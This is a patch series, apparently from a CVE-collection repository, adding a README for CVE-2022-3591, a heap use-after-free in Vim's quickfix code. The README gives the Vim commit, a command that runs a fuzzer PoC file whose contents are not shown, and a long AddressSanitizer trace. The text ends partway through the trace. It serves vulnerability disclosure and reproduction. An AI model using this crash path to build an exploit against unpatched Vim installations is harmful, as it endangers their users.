From fcc33cad117ad0b4aafa6b2f74bd9ff921e05868 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:00:22 +0000
Subject: [PATCH 01/11] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-3591?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/vim/2022/CVE-2022-3591/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/vim/2022/CVE-2022-3591/.keep
diff --git a/cve/vim/2022/CVE-2022-3591/.keep b/cve/vim/2022/CVE-2022-3591/.keep
new file mode 100644
index 00000000..e69de29b
--
Gitee
From ea47c65daf6a88852db0407ad3a4cd1a597499d5 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:02:42 +0000
Subject: [PATCH 02/11] rename cve/vim/2022/CVE-2022-3591/.keep to cve/vim/2022/CVE-2022-3591/README.md.
Signed-off-by: Mz_zM
---
cve/vim/2022/CVE-2022-3591/{.keep => README.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename cve/vim/2022/CVE-2022-3591/{.keep => README.md} (100%)
diff --git a/cve/vim/2022/CVE-2022-3591/.keep b/cve/vim/2022/CVE-2022-3591/README.md
similarity index 100%
rename from cve/vim/2022/CVE-2022-3591/.keep
rename to cve/vim/2022/CVE-2022-3591/README.md
--
Gitee
From ada62a2facb4a7df1b911505bb2c8d72acc5e3e1 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:18:14 +0000
Subject: [PATCH 03/11] update cve/vim/2022/CVE-2022-3591/README.md.
Signed-off-by: Mz_zM
---
cve/vim/2022/CVE-2022-3591/README.md | 372 +++++++++++++++++++++++++++
1 file changed, 372 insertions(+)
diff --git a/cve/vim/2022/CVE-2022-3591/README.md b/cve/vim/2022/CVE-2022-3591/README.md
index e69de29b..c99086d0 100644
--- a/cve/vim/2022/CVE-2022-3591/README.md
+++ b/cve/vim/2022/CVE-2022-3591/README.md
@@ -0,0 +1,372 @@
+ **描述**
+Use After Free in function qf_get_curlist at quickfix.c:1932
+
+**vim 版本**
+
+```
+git log
+commit bf72e0c67f26ea7c8fd941fdd1533c24c7b6cb43 (grafted, HEAD -> master, tag: v9.0.0792, origin/master, origin/HEAD)
+```
+
+ **POC**
+
+
+```
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S /home/fuzz/test/poc14_huaf.dat -c :qa!
+=================================================================
+==147326==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00005be88 at pc 0x55f4ac3e895f bp 0x7ffe39fa57b0 sp 0x7ffe39fa57a0
+READ of size 4 at 0x61b00005be88 thread T0
+ #0 0x55f4ac3e895e in qf_get_curlist /home/fuzz/vim/src/quickfix.c:1932
+ #1 0x55f4ac3f4422 in qf_win_pos_update /home/fuzz/vim/src/quickfix.c:4446
+ #2 0x55f4ac3f4f99 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4609
+ #3 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902
+ #4 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
+ #5 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
+ #6 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912
+ #7 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571
+ #8 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
+ #9 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
+ #10 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
+ #11 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
+ #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
+ #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
+ #14 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
+ #15 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146
+ #16 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
+ #17 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578
+ #18 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
+ #19 0x55f4ac49d19f in do_source_ext 
/home/fuzz/vim/src/scriptfile.c:1667 + #20 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #21 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #22 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #23 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #24 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #25 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #26 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #27 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #28 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #29 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #30 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #31 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #32 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #33 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #34 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #35 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #36 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #37 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #38 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #39 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #40 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #41 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #42 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #43 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #44 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #45 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #46 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #47 0x55f4ac17bec2 in do_one_cmd 
/home/fuzz/vim/src/ex_docmd.c:2578 + #48 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #49 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #50 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #51 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #52 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #53 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #54 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #55 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #56 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #57 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #58 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #59 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #60 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #61 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #62 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #63 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #64 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #65 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #66 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #67 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #68 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #69 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #70 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #71 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #72 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #73 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #74 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #75 0x55f4ac49acce in cmd_source 
/home/fuzz/vim/src/scriptfile.c:1146 + #76 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #77 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #78 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #79 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #80 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #81 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #82 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #83 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #84 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #85 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #86 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #87 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #88 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #89 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #90 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #91 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #92 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #93 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #94 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #95 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #96 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #97 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #98 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #99 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #100 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #101 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #102 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #103 0x55f4ac17302d in 
do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #104 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #105 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #106 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #107 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #108 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #109 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #110 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #111 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #112 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #113 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #114 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #115 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #116 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #117 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #118 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #119 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #120 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #121 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #122 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #123 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #124 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #125 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #126 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #127 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #128 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #129 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #130 0x55f4ac49acce in cmd_source 
/home/fuzz/vim/src/scriptfile.c:1146 + #131 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #132 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #133 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #134 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #135 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #136 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #137 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #138 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #139 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #140 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #141 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #142 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #143 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #144 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #145 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #146 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #147 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #148 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #149 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #150 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #151 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #152 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #153 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #154 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #155 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #156 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #157 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #158 
0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #159 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #160 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #161 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #162 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #163 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #164 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #165 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #166 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #167 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #168 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #169 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #170 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #171 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #172 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #173 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #174 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #175 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #176 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #177 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #178 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #179 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #180 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #181 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #182 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #183 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #184 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #185 0x55f4ac49acce in cmd_source 
/home/fuzz/vim/src/scriptfile.c:1146 + #186 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #187 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #188 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #189 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #190 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #191 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #192 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #193 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #194 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #195 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #196 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #197 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #198 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #199 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #200 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #201 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #202 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #203 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #204 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #205 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #206 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #207 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #208 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #209 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #210 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #211 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #212 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #213 
0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #214 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #215 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #216 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #217 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #218 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #219 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #220 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #221 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #222 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #223 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #224 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #225 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #226 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #227 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #228 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #229 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #230 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #231 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #232 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #233 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #234 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #235 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #236 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #237 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #238 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #239 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #240 0x55f4ac49acce in cmd_source 
/home/fuzz/vim/src/scriptfile.c:1146 + #241 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #242 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #243 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #244 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #245 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #246 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #247 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #248 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #249 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #250 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + +0x61b00005be88 is located 8 bytes inside of 1464-byte region [0x61b00005be80,0x61b00005c438) +freed by thread T0 here: + #0 0x7f862ee4340f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 + #1 0x55f4abfed596 in vim_free /home/fuzz/vim/src/alloc.c:615 + #2 0x55f4ac3e91ab in ll_free_all /home/fuzz/vim/src/quickfix.c:2049 + #3 0x55f4ac4023ee in qf_free_stack /home/fuzz/vim/src/quickfix.c:7714 + #4 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750 + #5 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560 + #6 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589 + #7 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049 + #8 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681 + #9 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841 + #10 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647 + #11 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971 + #12 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #13 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #14 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232 + #15 0x55f4ac000401 
in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710 + #16 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540 + #17 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538 + #18 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378 + #19 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423 + #20 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855 + #21 0x55f4ac3f4f31 in qf_update_buffer /home/fuzz/vim/src/quickfix.c:4604 + #22 0x55f4ac3f1e4a in qf_age /home/fuzz/vim/src/quickfix.c:3902 + #23 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #24 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #25 0x55f4ac60adaa in do_ucmd /home/fuzz/vim/src/usercmd.c:1912 + #26 0x55f4ac17be2c in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2571 + #27 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #28 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #29 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + +previously allocated by thread T0 here: + #0 0x7f862ee43808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 + #1 0x55f4abfed2aa in lalloc /home/fuzz/vim/src/alloc.c:246 + #2 0x55f4abfed140 in alloc_clear /home/fuzz/vim/src/alloc.c:177 + #3 0x55f4abfed1e1 in alloc_clear_id /home/fuzz/vim/src/alloc.c:193 + #4 0x55f4ac3e9cec in qf_alloc_stack /home/fuzz/vim/src/quickfix.c:2233 + #5 0x55f4ac40231d in qf_free_stack /home/fuzz/vim/src/quickfix.c:7707 + #6 0x55f4ac4024b6 in set_errorlist /home/fuzz/vim/src/quickfix.c:7750 + #7 0x55f4ac40612e in set_qf_ll_list /home/fuzz/vim/src/quickfix.c:8560 + #8 0x55f4ac4062a9 in f_setloclist /home/fuzz/vim/src/quickfix.c:8589 + #9 0x55f4ac111208 in call_internal_func /home/fuzz/vim/src/evalfunc.c:3049 + #10 0x55f4ac621a2d in call_func /home/fuzz/vim/src/userfunc.c:3681 + #11 0x55f4ac6181b9 in get_func_tv /home/fuzz/vim/src/userfunc.c:1841 + 
